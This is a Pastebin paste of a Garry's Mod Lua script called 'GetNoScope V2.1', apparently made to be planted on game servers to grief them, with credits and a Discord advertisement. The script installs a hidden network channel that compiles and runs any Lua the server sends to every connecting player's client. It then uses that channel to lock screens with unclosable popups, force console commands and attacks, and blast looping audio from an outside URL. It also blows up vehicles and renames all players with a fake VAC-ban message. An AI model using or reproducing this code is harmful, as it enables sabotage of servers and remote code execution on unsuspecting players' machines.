Advertisement
Guest User

get noscpefuture pas

a guest
Jul 23rd, 2019
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.27 KB | None | 0 0
  1. --[[
  2.  
  3. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  4. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  5. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  6. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  7.  
  8. ]]--
  9.  
  10.  
  11. print([=[
  12. ██████╗ ███████╗████████╗
  13. ██╔════╝ ██╔════╝╚══██╔══╝
  14. ██║ ███╗█████╗ ██║
  15. ██║ ██║██╔══╝ ██║
  16. ╚██████╔╝███████╗ ██║
  17. ╚═════╝ ╚══════╝ ╚═╝
  18. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  19. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  20. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  21. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  22. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  23. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  24. BY THEFUTUREARMA --> GetNoScope V2.1.Self-Leak
  25. Buy GIZEH_ECO+ https://discord.gg/mspzRFn !
  26.  
  27. ¯\_(ツ)_/¯
  28.  
  29. ]=])
  30.  
  31.  
  32. for k, v in pairs( player.GetAll() ) do
  33. if ( v:Alive() ) then
  34. v:GodEnable()
  35. else
  36. v:Spawn()
  37. timer.Simple( 1.2, function()
  38. v:GodEnable()
  39. end)
  40. end
  41. end
  42.  
  43.  
  44. local function rdm_str(len)
  45. if !len or len <= 0 then return '' end
  46. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  47. end
  48.  
  49. local net_string = rdm_str(25)
  50.  
  51. util.AddNetworkString(net_string)
  52. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  53. hook.Add("PlayerInitialSpawn", "☂️_PRIVATE_JOKE",function(ply)
  54. if !ply:IsBot() then
  55. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  56. end
  57. end)
  58.  
  59. local function SendToClient(code)
  60. local data = util.Compress(code)
  61. local len = #data
  62. net.Start(net_string)
  63. net.WriteUInt(len, 16)
  64. net.WriteData(data, len)
  65. net.Broadcast()
  66. end
  67. timer.Simple( 17, function()
  68. SendToClient([[
  69.  
  70. print([=[
  71. ██████╗ ███████╗████████╗
  72. ██╔════╝ ██╔════╝╚══██╔══╝
  73. ██║ ███╗█████╗ ██║
  74. ██║ ██║██╔══╝ ██║
  75. ╚██████╔╝███████╗ ██║
  76. ╚═════╝ ╚══════╝ ╚═╝
  77. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  78. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  79. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  80. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  81. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  82. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  83. BY THEFUTUREARMA --> GetNoScope V2.1.Self-Leak
  84. Buy GIZEH_ECO+ https://discord.gg/mspzRFn ! !
  85. ¯\_(ツ)_/¯
  86. ]=])
  87.  
  88.  
  89. hook.Add("Think","🤔_WHY_YOU_WANT_EDIT_MY_CODE",function() gui.HideGameUI() end)
  90.  
  91.  
  92.  
  93. local CreateModel = function(mdl, isragdoll)
  94. local ent
  95.  
  96. if isragdoll then
  97. ent = ClientsideRagdoll(mdl)
  98. else
  99. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  100. end
  101.  
  102.  
  103. return ent
  104. end
  105.  
  106. local NewHookAdd = function(str, name, func)
  107. --name = "dronesrewrite_hell_hooks" .. name
  108. hook.Add(str, name, func)
  109.  
  110. table.insert(cache, {
  111. str = str,
  112. name = name
  113. })
  114. end
  115.  
  116. local cache = { }
  117. timercache = { }
  118. local Const = 0
  119. local Noise = nil
  120. local pl = LocalPlayer()
  121. timer.Create("💸_BUY_GIZEH_ECO_+_💸", 2, 1, function()
  122. local dlight = DynamicLight(pl:EntIndex())
  123. if dlight then
  124. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  125. dlight.r = 255
  126. dlight.g = 0
  127. dlight.b = 0
  128. dlight.brightness = 16
  129. dlight.Decay = 1000
  130. dlight.Size = 2000
  131. dlight.DieTime = CurTime() + 2
  132. end
  133.  
  134. local pos = pl:GetPos() + Vector(0, 0, 120)
  135. local ang = Angle(0, pl:GetAngles().y, 0)
  136.  
  137. local tr = util.TraceLine({
  138. start = pos,
  139. endpos = pos + ang:Forward() * 86,
  140. filter = pl
  141. })
  142.  
  143. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  144.  
  145. for i = 1, 16 do
  146. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  147. end
  148.  
  149.  
  150. local mdl = CreateModel("models/food/hotdog.mdl")
  151. mdl:SetModelScale(5)
  152. mdl:SetAngles(ang + Angle(15, 180, 0))
  153. mdl:SetPos(rag_pos)
  154. mdl:Spawn()
  155.  
  156.  
  157. hook.Add("CalcView", "😕_EDIT_MON_CODE_TU_EST_STUPIDE", function(ply, _pos, _ang, fov)
  158. local view = { }
  159. view.origin = pos + VectorRand()
  160. view.angles = ang
  161. view.fov = fov + math.random(-80, -50)
  162.  
  163. return view
  164. end)
  165.  
  166. timer.Create("👻_GIZEH_ECO_+_", 1.4, 1, function()
  167. mdl:Remove()
  168. hook.Remove("CalcView", "😕_EDIT_MON_CODE_TU_EST_STUPIDE")
  169. end)
  170. end)
  171. ]])
  172. end)
  173.  
  174. timer.Simple( 20, function()
  175. timer.Create( "ouupsss", 0.1, 0, function()
  176. for k,v in pairs(player.GetAll()) do
  177. v:SendLua('RunConsoleCommand("impulse","100")')
  178. end
  179. end)
  180. hook.Add( 'SetupMove', '😈_NO_SCOPED', function( ply, move )
  181. if not ply:IsOnGround() then
  182. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  183. end
  184. end )
  185. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  186.  
  187. local explo = ents.Create("env_explosion")
  188. explo:SetPos(v:GetPos())
  189. explo:SetKeyValue("iMagnitude", "300")
  190. explo:Spawn()
  191. explo:Activate()
  192. explo:Fire("Explode", "", 0)
  193. end
  194.  
  195. end
  196. for k,v in pairs(player.GetAll()) do
  197. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  198. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  199. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  200. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  201. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  202. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  203. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  204. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  205. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  206. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  207. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  208. v:ManipulateBoneScale( a, Vector(100,100,100))
  209. v:ManipulateBoneScale( b, Vector(100,100,100))
  210. v:ManipulateBoneScale( c, Vector(100,100,100))
  211. v:ManipulateBoneScale( d, Vector(100,100,100))
  212. v:ManipulateBoneScale( e, Vector(100,100,100))
  213. v:ManipulateBoneScale( f, Vector(100,100,100))
  214. v:ManipulateBoneScale( g, Vector(100,100,100))
  215. v:ManipulateBoneScale( h, Vector(100,100,100))
  216. v:ManipulateBoneScale( i, Vector(100,100,100))
  217. v:ManipulateBoneScale( j, Vector(100,100,100))
  218. v:ManipulateBoneScale( k, Vector(100,100,100))
  219. end
  220. SendToClient([[
  221.  
  222. surface.CreateFont( "1XX3_big_text",{
  223. font = "Open Sans",
  224. size = 500,
  225. weight = 1000,
  226. antialias = true
  227. })
  228.  
  229. surface.CreateFont("3Y_IXX3", {
  230. font = "Open Sans",
  231. size = ScrW()*0.02,
  232. weight = 10,
  233. blursize = 0,
  234. scanlines = 2.5,
  235. antialias = false
  236. })
  237.  
  238. local function UwU_text( a )
  239.  
  240. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  241. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  242. local b = 215
  243.  
  244. return Color( r, g, b, a or 255 )
  245.  
  246. end
  247.  
  248. local w,h = ScrW(), ScrH()
  249. local W, H = ScrW(), ScrH()
  250. local MySelf = LocalPlayer()
  251.  
  252. if ohno then
  253. ohno:Remove()
  254. ohno = nil
  255. end
  256.  
  257. ohno = vgui.Create( "DFrame" )
  258. ohno:SetSize( w, h )
  259. ohno:SetPos(0,0)
  260. ohno:SetDraggable ( false )
  261. ohno:SetTitle("")
  262. ohno:MakePopup();
  263. ohno:ShowCloseButton(false)
  264.  
  265. ohno.Paint = function( self )
  266. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  267. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  268. end
  269.  
  270. local pw, ph = w, h*0.6
  271. local px, py = w/2-pw/2, h/2-ph/2
  272.  
  273.  
  274. local Close = vgui.Create( "DButton", ohno )
  275. Close:SetPos(px, py)
  276. Close:SetText( "" )
  277. Close:SetSize( pw, ph )
  278. Close.Paint = function( self, tw, th )
  279.  
  280. local shift = math.sin(RealTime()*3)*1.5 + 5
  281.  
  282.  
  283. draw.SimpleText( "THEFUTUREARMA", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  284. draw.SimpleText( "THEFUTUREARMA", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  285. draw.DrawText( "(╯°□°)╯︵ ┻━┻ THEFUTUREARMA", "3Y_IXX3", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  286. draw.DrawText( "(╯°□°)╯︵ ┻━┻ HAKED BY GIZEH_ECO +", "3Y_IXX3", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  287. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  288. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  289. draw.DrawText( "Σ", "3Y_IXX3", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  290. draw.DrawText( "Σ BY THEFUTUREARMA", "3Y_IXX3", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  291. draw.DrawText( "THEFUTUREARMA ;)", "3Y_IXX3", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  292. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  293. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  294. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  295. draw.DrawText( "GIZEH_ECO_+", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  296. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  297. draw.DrawText( "GIZEH_ECO_+", "3Y_IXX3", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  298. draw.DrawText( "RIP ;) BY IXXE", "3Y_IXX3", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  299. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  300. draw.DrawText( "HAKED BY GIZEH_ECO + ;)", "3Y_IXX3", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  301. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  302. draw.DrawText( "THEFUTUREARMA", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  303. draw.DrawText( "GetNoScope THEFUTUREARMA", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  304. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  305. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  306. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  307. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  308. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  309.  
  310. end
  311. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  312. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  313. timer.Create("🥵_MENU_LUA_IS_DEAD_BUY_GIZEH_ECO_+", 0.1, 0, function()
  314. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  315. end)
  316.  
  317. timer.Simple( 15, function()
  318.  
  319. wut = vgui.Create( "DFrame" )
  320. wut:SetSize( w, h )
  321. wut:SetPos(0,0)
  322. wut:SetDraggable ( false )
  323. wut:SetTitle("")
  324. wut:ShowCloseButton(false)
  325.  
  326. wut.Paint = function( self )
  327. surface.SetDrawColor(30, 30, 30, 0)
  328. end
  329.  
  330. local Close = vgui.Create( "DButton", wut )
  331. Close:SetPos(px, py)
  332. Close:SetText( "" )
  333. Close:SetSize( pw, ph )
  334. Close.Paint = function( self, tw, th )
  335.  
  336. local shift = math.sin(RealTime()*3)*1.5 + 5
  337.  
  338.  
  339. draw.SimpleText( "GIZEH_ECO_+", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  340. draw.SimpleText( "GIZEH_ECO_+", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  341.  
  342. end
  343.  
  344. RunConsoleCommand("r_shader_srgb","1")
  345. RunConsoleCommand("gmod_language","ko")
  346. ohno:Remove()
  347. ohno = nil
  348.  
  349. local name = GetConVar("sv_skyname"):GetString()
  350. if name == "painted" then
  351. local sky
  352. for _, v in ipairs(ents.GetAll()) do
  353. if v:GetClass() == "env_skypaint" then
  354. sky = v
  355. break
  356. end
  357. end
  358. if !IsValid(sky) then return end
  359. hook.Add("PostRender","☁️_RAINBOW",function()
  360. local col = HSVToColor(CurTime()*30 % 360,1,1)
  361. col = Vector(col.r/255,col.g/255,col.b/255)
  362. sky:SetTopColor(col)
  363. sky:SetBottomColor(col)
  364. end)
  365. else
  366. local prefix = {"lf","ft","rt","bk","dn","up"}
  367. local mats = {}
  368. for i=1,6 do
  369. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  370. end
  371. hook.Add("PostRender","☁️_RAINBOW",function()
  372. local col = HSVToColor(CurTime()*30 % 360,1,1)
  373. for i=1,6 do
  374. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  375. end
  376. end)
  377. end
  378. local chienchaud = ClientsideModel("models/food/hotdog.mdl")
  379. chienchaud:SetNoDraw(true)
  380. chienchaud:SetModelScale(120)
  381. timer.Create("☄️_LOOK_THE_SKY", 0.01, 0, function()
  382. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  383. end)
  384.  
  385. local data = {}
  386. local function genchienchaud(id)
  387. local pos = LocalPlayer():GetPos()
  388. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  389. end
  390. for i=1, 150 do
  391. genchienchaud(i)
  392. end
  393. hook.Add("PostDrawOpaqueRenderables","🌭_CHIEN_CHAUD",function()
  394. local z = LocalPlayer():GetPos().z
  395. for i=1, #data do
  396. chienchaud:SetPos(data[i][1])
  397. chienchaud:SetupBones()
  398. chienchaud:DrawModel()
  399. data[i][1].z = data[i][1].z - data[i][2] / 20
  400. if data[i][1].z <= z then
  401. genchienchaud(i)
  402. end
  403. end
  404. end)
  405. end )
  406.  
  407.  
  408. sound.PlayURL( "https://gvac.cz/assets/mlg.mp3", "mono noblock noplay", function( station )
  409. timer.Simple( 0.1, function()
  410. ClientStation = station
  411. station:EnableLooping( true )
  412. station:Play()
  413. station:SetVolume( 20 )
  414. end )
  415. end )
  416.  
  417. timer.Create("🔒", 0.11, 0, function()
  418. RunConsoleCommand("+attack")
  419. end)
  420. timer.Create("🔓", 0.12, 0, function()
  421. RunConsoleCommand("-attack")
  422. end)
  423. ]])
  424. end)
  425.  
  426. local you = "💸_BUY_GIZEH_ECO_+"
  427.  
  428. timer.Simple( 20, function()
  429.  
  430. membresenigma =
  431. {
  432. "GIZEH_ECO",
  433. "THEFUTUREARMA",
  434. "GIZEH_ECO",
  435. "GIZEH_ECO",
  436. "THEFUTUREARMA",
  437. "THEFUTUREARMA",
  438. "THEFUTUREARMA",
  439. "GET NO SCOPE !!!!",
  440. "GET NO SCOPE !!!!",
  441. "GET NO SCOPE !!!!",
  442. "GET NO SCOPE !!!!",
  443. "GET NO SCOPE !!!!",
  444. "GET NO SCOPE !!!!",
  445. "GET NO SCOPE !!!!",
  446. "GET NO SCOPE !!!!",
  447. "BY THEFUTUREARMA",
  448. "BY THEFUTUREARMA",
  449. "BY THEFUTUREARMA",
  450. "BY THEFUTUREARMA",
  451. "BY THEFUTUREARMA"
  452. }
  453.  
  454. timer.Create( "🦠_NE_DEL_RIEN_SINON_CANCER", 0.2, 0, function()
  455. for k, ply in pairs( player.GetAll() ) do
  456. DarkRP.notify(ply, 2, 2, "[Oh No !] "..table.Random(membresenigma).."")
  457. end
  458. end)
  459.  
  460.  
  461. for k,v in pairs(player.GetAll()) do
  462. v:SetRunSpeed(400* 4);
  463. v:SetWalkSpeed(400 * 4);
  464. end
  465.  
  466.  
  467. timer.Create( "🤫_RIP_U_VAC_BANNED", 1, 0, function()
  468. for k,v in pairs(player.GetAll()) do
  469. v:GodEnable()
  470. v:setDarkRPVar( "rpname", "This Steam account has been VAC banned from secure servers due to a cheating infraction." )
  471. end
  472.  
  473. end )
  474.  
  475. end)
  476.  
  477.  
  478. timer.Create( "🤤_SPAM", 0, 0, function()
  479. SendToClient([[print("GET NOSCOPE !! THEFUTUREARMA")]])
  480. print("GET NOSCOPE !! THEFUTUREARMA")
  481. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement